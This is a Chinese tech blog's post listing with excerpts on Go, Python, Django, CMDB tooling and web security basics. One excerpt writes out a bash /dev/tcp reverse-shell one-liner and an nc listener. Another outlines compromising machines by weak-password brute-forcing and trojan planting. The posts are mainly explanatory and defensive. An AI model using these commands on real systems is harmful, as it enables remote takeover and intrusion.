- 博客(35)
- 收藏
- 关注
RSS订阅转载 golang 基础(三)
反射反射优点: 让代码更灵活缺点: 运行效率低反射应用各种 web框架, 配置文件解析库,ORM框架反射是指在程序运行期对程序本身进行访问和修改的能力。程序在编译时,变量被转换为内存地址,变量名不会被编译器写入到可执行部分。在运行程序时,程序无法获取自身的信息。支持反射的语言可以在程序编译期将变量的反射信息,如字段名称、类型信息、结构体信息等整合到可执行文件中,并给程...
2019-09-19 12:07:00
267
转载 golang 基础(二)
接口接口 -> 是一种 类型!!! 一种抽象的类型接口(interface)定义了一个对象的行为规范,只定义规范不实现,由具体的对象来实现规范的细节。接口类型在Go语言中接口(interface)是一种类型,一种抽象的类型。interface是一组method的集合,是duck-type programming的一种体现。接口做的事情就像是...
2019-09-19 10:26:00
213
转载 golang 基础(一)
在进行Go语言开发的时候,我们的代码总是会保存在$GOPATH/src目录下。在工程经过 go build、go install或go get等指令后,会将下载的第三方包源代码文件放在$GOPATH/src目录下, 产生的二进制可执行文件放在 $GOPATH/bin目录下,生成的中间缓存文件会被保存在 $GOPATH/pkg 下。/bin/ - > 存放编译后的二进制文件...
2019-08-23 15:32:00
461
转载 自动化发布系统 - 全新自研
小生不才,自研全新发布系统,现处于我一人开发当中,后续博客将不断更新Django : 1.11.11 Python : 3.6项目简介: - 基于git 系列(github, gitlab) - 一键发布代码,无需其他人工干预 - 定时执行,立即执行 (妈妈再也不用担心我熬夜发布啦) - 工单人工审核系统...
2019-06-14 18:41:00
862
转载 应急响应
什么是应急响应PDCERF模型P (Preparation准备)D (Detection诊断)C (Containment抑制)E (Eradication根除)R (Recovery恢复)F (follow-up跟踪)其实就是为了快速定位问题点,快速解决问题原因应急工具:ls, ifconfig , ps ,...
2019-05-30 11:50:00
1718
转载 扫描工具介绍
NmapNmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具。下载安装:https://nmap.org/dist/nmap-7.70-setup.exerpm -vhU https://...
2019-05-27 15:29:00
699
转载 入侵检测
蜜罐蜜罐是什么蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击...
2019-05-21 15:35:00
292
转载 安全防护与加固
安全加固Centos 7 安全加固SSH 加密yum -y install expectmkpasswd服务器上所有账号的密码都要采用毫无关联的强密码,密码为不少于16位的大小写字母数字特殊符号的组合。修改SSH配置文件1. 改默认端口 22 -> 578622. 禁止root帐号登录3. 指定允许登录帐号SHH root ...
2019-05-17 16:55:00
566
转载 常见的运维漏洞
这篇 将会持续更新并完善 常见的web应用漏洞主要涉及到Linux常用服务的一些安全配置加固,以及一些常见的安全漏洞等。。zabbix 漏洞当你忘记密码也可以通过这个漏洞也能修改到密码zabbix 配置不当安全事件实例:1. sohu的zabbix,可导致内网渗透http://wy.zone.ci/bug_detail.php?wybug_i...
2019-05-13 18:27:00
1591
转载 代码版本控制 的 文件泄露
文件泄露Git什么是文件泄露GitHub.git # 攻击者可以通过。 .git 内部文件,能看到很信息.svn.DS_Store.hg.bzrcvsWEB-INF网站备份,zip 、sql、rar、swp、phpinfoGithubGithub是目前全球最热门的在线协作网站,大量的程序员都会在Github上分享自己的代码以及协力进行软件...
2019-05-08 15:30:00
383
转载 WEB漏洞之 - XSS漏洞 (跨站脚本工具)
什么是XSSXSS 又叫CSS(Cross site Scripting)跨站脚本工具,常见的WEB漏洞之一,再2013年度OWASP TOP 10 中排名第三XSS 是指攻击者再网页中嵌入客户端脚本,通常是JS恶意代码,当用户使用浏览器访问被嵌入恶意代码网页时,就会再用户浏览器上执行。XSS有什么危害网络钓鱼,窃取用户Cookise,弹广告刷流量,具备改页面信息,删除文章,...
2019-05-08 11:39:00
838
转载 web 漏洞 - sql注入
web 漏洞 - sql注入抓包工具BurpSuitejava 1.8BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了:Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer通过拦截HTTP/HTTPS的web数据包,充当浏览器和相...
2019-05-07 15:06:00
145
转载 渗透流程
渗透流程了解什么是渗透?渗透就是模拟黑客攻击找到企业程序中的漏洞。时间、耐心、细心、精力集中渗透也分为几类:白帽子,查找企业漏洞提交修复。黑帽黑客,这类人可能有背景或者其它利益相关会,查找漏洞并且深入获取信息。常规渗透保密协议,找到漏洞不能发出来针对性目标测试, 对某一性的针对测试指定范围测试, 指定的范围内测试非常规APT攻击红蓝对抗...
2019-05-06 18:19:00
163
转载 安全术语
肉鸡、抓鸡抓鸡 指通过扫描弱口令,爆破,漏洞自动化种马 达到控制机器端口1433 抓鸡 sqlserver 流程:网段扫描端口,进行爆破弱密码,下载木马3389 抓鸡3306 抓鸡木马分类计算机木马,网页木马大马,小马,一句话木马webshell以asp、php、jsp或者cgi 等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页后门。黑客再入侵了一...
2019-05-06 17:10:00
170
转载 以Python写的 反弹工具
python 反弹shell我们知道,一般的反弹shell 可以直接使用 base 反弹bash -i >& /dev/tcp/ownip/port 0>&1还可以使用一些简单的命令 nc nmap 等等。。。。nc -l -p port -vv xxx经过前几次的攻击,他也变聪明了,知道我针对了php 的文件...
2019-04-24 11:43:00
242
转载 提供远程的webshell
之前网站被黑挂了马很恶心本人能力有限, 漏洞太多, 补不过来,网站经常被 黑客进来玩过家家。被逼无奈之下还好我发开了一整套的监控维护脚本系统只要你敢上传, 即上传即失效唉,废话不多少,来看脚本这B 竟然再我的 /tmp/ 目录下上了个 伪装的类似安全证书的东西。一般你不细看 ,还是真的难区分啊一个PHP写的简单的...
2019-04-24 11:29:00
430
转载 Python 面向对象,类的属性和 类的方法
面向对象,类的属性和类的方法面向对象类和对象Python类定义类属性类方法面向过程和面向对象面向过程 和 面向对象 编程面向过程 编程:函数式编程,C程序,shell等面向对象 编程:C++ ,Java,Python类和对象类和对象:是面向对象中的两个重要概念1.类: 是对事物的抽象,比如:人类,球类2.对象:是类的一个实例,比如...
2019-04-24 10:45:00
182
转载 Python 函数
函数函数就是完成特定功能的一个语句组,这组语句可以作为一个单位使用,并且给它取一个名可以通过函数名在程序的不同地方多次执行(通常叫函数调用)预定义函数:可以直接使用自定义函数:自己编写为什么使用函数降低编程难度通常将一个复杂的大问题,分解成一系列的小问题,然后将小问题,然后将小问题划分成更小的问题,当问题细化为足够简单时,我们就可以分而治之,各个小问题解决了,大问题就...
2019-04-24 10:43:00
428
转载 Python 小试牛刀
练一练统计系统内存统计系统内存free 命令等同于查看系统文件 cat /proc/meminfo需要两个重要的方法line.startswith('字符串') #找开头符合这个字符串的进行判断,返回布尔值help(line.startswith())查看帮助startswith(...) S.startswith(prefix[, start[, end]...
2019-04-23 18:26:00
110
转载 Python 流程控制
Python 流程控制条件 ifif ... elif ... elseif语句if expression: #expression 关键字statement(s)注:python 使用缩进作为其语句分组的方法,建议使用4个空格#!/usr/bin/pythonif 1: #1 为 True, 0为 False, None ...
2019-04-23 18:22:00
59
转载 Python
Python 入门到入狱Python 安装centos 6Linux 系统自带 python 2.6centos 7Linux 系统自带 python 2.7python -V #查看版本windowns 需要手动安装,和一般软件安装没有区别,一直下一步下一步。默认在C盘下的python2.X目录下。需要手动加入系统环境变量里下载地址 :https://www.py...
2019-04-23 18:20:00
150
转载 CMDB - ModelForm
CMDB - ModelForm当我们写的页面越来越多,需要的增删改查查的页面就会成倍增长。为了解决这个重复搬无用砖的问题,在django 的admin源码理由,就有一个可以套用复写的方法自动发现功能在urls.py里admin自带的一个源码urlpatterns = [ url(r'^admin/', admin.site.urls), # admin.site...
2019-04-23 18:14:00
61
转载 CMDB - 发布系统
CMDB - 发布系统完全自己开发一套发布系统表设计环境,主机 , -> salt-id代码地址、就是包 -> 地址应用 -> app-记录日志 -> 时间,事件SaltStackSaltStack 采用 C/S模式master和minion之间的通信用到了zeromq消息队列 ,每个minion 有一个salt_id 是绝对唯...
2019-04-23 18:13:00
141
转载 CMDB - Bootstarp 套用模板
Bootstarp 套用模板bootstrap导入静态资源STATICFILES = (...) # setings.py 文件里在template里面 开头使用{% load staticfiles %}{% static '路径' %} # 导入拼接bootstarp/mian,html{% load staticfiles %}<!DOCTYPE ...
2019-04-23 18:12:00
385
转载 CMDB 权限系统
CMDB权限系统权限系统业务场景: CMDB --用户名密码 生成环境的机器: root 运维 user 运维 readonly 运维/开发/测试/项目主管 灰度环境的机器: root 运维 user ...
2019-04-23 18:11:00
347
转载 阿里云服务器 API 的使用
阿里云服务器 API 的使用针对,云服务器的 API 使用针对于阿里云会有两个 认证的keyAccessKey : ID 和 SecretAPI 文档 : 给的是接口实例相关接口https://help.aliyun.com/document_detail/104186.html?spm=a2c4g.11186623.6.555.77e51198x7XE5Uopen ...
2019-04-23 18:08:00
1272
转载 CMDB 资产管理
CMDB 资产管理环境 : Linux 7.4 Django 1.11+ Python 3.6CMDBCMDB工作流程图.png代码的发布/监控/堡垒机资产管理。代替execl,将execl表里的内容导入我们系统中和其他系统交互 通过 client端进行采集数据。salt-stack/ ansible/ 阿里云封装的...
2019-04-23 18:07:00
385
转载 Django uwsgi+nginx+django 部署上线
Django uwsgi+nginx+django 部署上线先安装 Python3tar xf Python-3.7.1.tgz需要先yum 安装需要的软件yum -y install gcc-c++yum -y install zlib zlib-develyum -y install bzip2 bzip2-develyum -y insta...
2019-04-23 17:59:00
75
转载 Django Middleware 中间件
Django Middleware中间件中间件字符串导入方式settins.py -> MIDDLEWARE 中间件的放置位置用户请求时,最先是从中间件,全部按顺序执行中间件又有两种,接收和返回的接收请求的中间件,request返回请求的中间件, response请求过来:中间件:拦截一部分请求;比如验证session, 没有登录的 ...
2019-04-23 17:55:00
172
转载 Django Form 表单
Django Form 表单form 表单Form表单验证(用户请求验证+生成HTML标签)表单验证 示例:用户管理 a. 添加用户页面 - 显示HTML标签 - 提交:数据验证 - 成功之后保存 - 错误显示错误信息创建自定义类,继承Form , 类属性 最好与数据库 列名相同...
2019-04-23 17:54:00
56
转载 Django FBV and CBV
Django FBV andCBVFBV_CBVFBV 就是函数 :functionCBV 就是类 :Classurls.pyurl(r'cbv_index', views.CBV.as_view()) #这样就是去访问 views.py 里面的类models.pyimprot json # json格式转换,需要引用from django....
2019-04-23 17:53:00
98
转载 Django cookie and session
Django cookie and sessioncookiecookie session客户端 <--- 交互 ---> 服务端 三次握手 四次挥手http 默认的是短链接的请求方式每次操作,都会有一次请求,一次响应,然后断开服务端session 是个庞大...
2019-04-23 17:51:00
68
转载 Django 分页器
Django 分页器分页器urls.pyurlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^page/', views.page), # 路由到分页器函数]views.pyfrom django.core.paginator import Paginator, EmptyPag...
2019-04-23 17:50:00
63
转载 Django ORM
Django ORM 一对多,多对多关系 的增删改查ORM一对多,多对多关系用到一对多,也可以应用到多对多一对多的增删改查跨表的话需要双下划线去跨字段sch__name一对多的查询_class = 'abc'obj = models.Class.objects.all() # --> [queryset,queryset]obj...
2019-04-23 17:48:00
52
转载 Django
初识Django环境 : Linux 7.4 Django 1.11+ Python 3.6请求用户 > 匹配url > urls.py路由 > 解析到视图 > views ,核心逻辑处理通过视图views.py通过QuerySet ---> modles --> DB数据库 --...
2019-04-23 17:19:00
85
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人